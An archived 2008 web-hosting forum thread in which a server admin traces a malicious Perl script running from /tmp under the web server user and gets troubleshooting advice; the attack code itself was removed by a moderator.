Portal Home > Knowledgebase > Articles Database > Track Perl Hacking Script
Track Perl Hacking Script
Posted by mali, 05-19-2008, 03:24 AM |
Hi ,
I have FreeBsd with Cpanel. someone is running attacking perl script from
my server.Below is information about that script but it shows / path in
command lsof -p 30251 | grep cwd.
PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND
29018 root 96 0 35968K 30528K select 0:03 2.71% 2.69% perl
newinst# lsof -p 30251 | grep cwd
lsof: WARNING: compiled for FreeBSD release 5.5-STABLE; this is 5.3-RELEASE.
perl 29018 root cwd VDIR 4,12 1024 2 /
newinst# ls -la / | more
total 22413
drwxr-xr-x 25 root wheel 1024 May 16 03:23 .
drwxr-xr-x 25 root wheel 1024 May 16 03:23 ..
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .black
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .black.bak
-rw-r--r-- 2 root wheel 801 Nov 5 2004 .cshrc
-rw-r--r-- 1 root wheel 355 Feb 21 2007 .new
-rw-r--r-- 2 root wheel 251 Nov 5 2004 .profile
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .rbl.db
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .rbl.db.bak
drwxrwxr-x 2 root operator 512 Jul 19 2005 .snap
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .uribl.db
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .uribl.db.bak
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .white
-rw-r--r-- 1 root wheel 1 Feb 21 2007 .white.bak
-r--r--r-- 1 root wheel 6184 Nov 5 2004 COPYRIGHT
drwx--x--x 3 root wheel 512 Aug 20 2005 backup
drwxr-xr-x 2 root wheel 1024 Dec 28 2006 bin
drwxr-xr-x 5 root wheel 512 Jul 19 2005 boot
drwxr-xr-x 2 root wheel 512 Jul 19 2005 cdrom
lrwxr-xr-x 1 root wheel 10 Jul 19 2005 compat -> usr/compat
-rw-r--r-- 1 root wheel 177 Dec 5 12:15 cpgd.c
dr-xr-xr-x 4 root wheel 512 May 16 16:23 dev
drwxr-xr-x 2 root wheel 512 Jul 19 2005 dist
-rw------- 1 root wheel 4096 May 13 15:58 entropy
drwxr-xr-x 28 root wheel 4608 May 19 11:57 etc
drwx--x--x 501 root wheel 9216 May 19 01:33 home
drwxr-xr-x 3 root wheel 1024 Jul 19 2005 lib
drwxr-xr-x 2 root wheel 512 Jul 19 2005 libexec
drwxr-xr-x 2 root wheel 512 Nov 5 2004 mnt
drwxr-xr-x 3 root wheel 512 Jul 21 2005 nonexistent
drwxr-xr-x 8 root wheel 512 Oct 30 2007 opt
-rw------- 1 root wheel 22786048 May 16 04:51 perl.core
dr-xr-xr-x 1 root wheel 0 May 19 11:57 proc
drwxr-xr-x 2 root wheel 2560 Jul 19 2005 rescue
drwxr-xr-x 13 root wheel 1024 May 19 01:33 root
drwxr-xr-x 2 root wheel 2560 Jul 19 2005 sbin
drwxr-xr-x 5 root wheel 13824 May 19 01:22 scripts
drwxr-xr-x 4 root wheel 1024 Jul 19 2005 stand
lrwxrwxrwx 1 root wheel 11 Jul 19 2005 sys -> usr/src/sys
drwxrwxrwt 9 root wheel 31744 May 19 11:57 tmp
drwxr-xr-x 21 root wheel 512 Dec 5 12:12 usr
drwxrwxrwx 24 root wheel 512 May 16 16:24 var
Can any one suggest where it is localted at / path.
|
Posted by david510, 05-19-2008, 09:09 AM |
Have a check in /tmp for any suspicious files. Also where you able to find under which user this process was running?
|
Posted by mali, 05-19-2008, 09:30 AM |
ls -la /tmp:
rwxrwxrwx 1 nobody wheel 77589 May 18 19:22 t.txt
The process is running under nobody user.
|
Posted by david510, 05-19-2008, 10:44 AM |
What is the content of that file?
cat t.txt
If you kill the process does it re-appear again?
|
Posted by mali, 05-19-2008, 10:53 AM |
newinst# cat t.txt | more
<>
Is there a way that i can clean all .txt file whenever uploaded on /tmp diretory.
Last edited by P-nut; 05-26-2008 at 10:36 AM.
Reason: Removed code
|
Posted by david510, 05-19-2008, 11:13 AM |
That shows it. Remove that file. try to trace out how it came in /tmp. Check the domlogs. You can set a cron to remove the .txt file every specified interval of time.
|
Posted by mali, 05-20-2008, 02:01 AM |
all these files uploaded at /tmp with nobody user and wheel group.
i want that these files must be with domain user rather than nobody user.
Thanks for your Help David.
|
Posted by mali, 05-21-2008, 06:20 AM |
How can i force all session and file upload to /tmp with
domain specific user.
|
Posted by mali, 05-26-2008, 06:27 AM |
Hi,
On today i have perl process running from /tmp.
1-ps -aux | grep perl
nobody 55545 0.0 0.4 4924 4244 ?? I 1:51AM 0:00.01 perl k.txt (perl5.8.8)
nobody 56633 0.0 0.4 5320 4632 ?? I 1:53AM 0:00.09 /usr/sbin/httpd (perl5.8.8)
lsof -p 55545 | grep cwd show /tmp path.
2-ls - la /
drwxrwxrwt 8 root wheel 31744 May 26 15:24 tmp
How these process are executed from nobody user from /tmp.
How acan i stop it to execute perl from /tmp like perl k.txt .
|
Posted by helpyoulinux, 05-26-2008, 07:59 AM |
Hello Mail,
As far as i can see, these files are uploaded through apache. So you shld check the apache logs, to get the Ip from which the file is uploaded. This way you can block that IP.
Regarding the question, "How can i force all session and file upload to /tmp with domain specific user.", you can try both apahce and php to run as Suexec.
Last edited by P-nut; 05-26-2008 at 10:39 AM.
Reason: Removed links to questionable (and possibly infected) sites
|
Posted by P-nut, 05-26-2008, 10:47 AM |
Thread has been cleaned of the hacking code and links to their sites. No need to send any traffic to those sites or give an aspiring script kiddie any ideas
|
Add to Favourites Print this Article
Also Read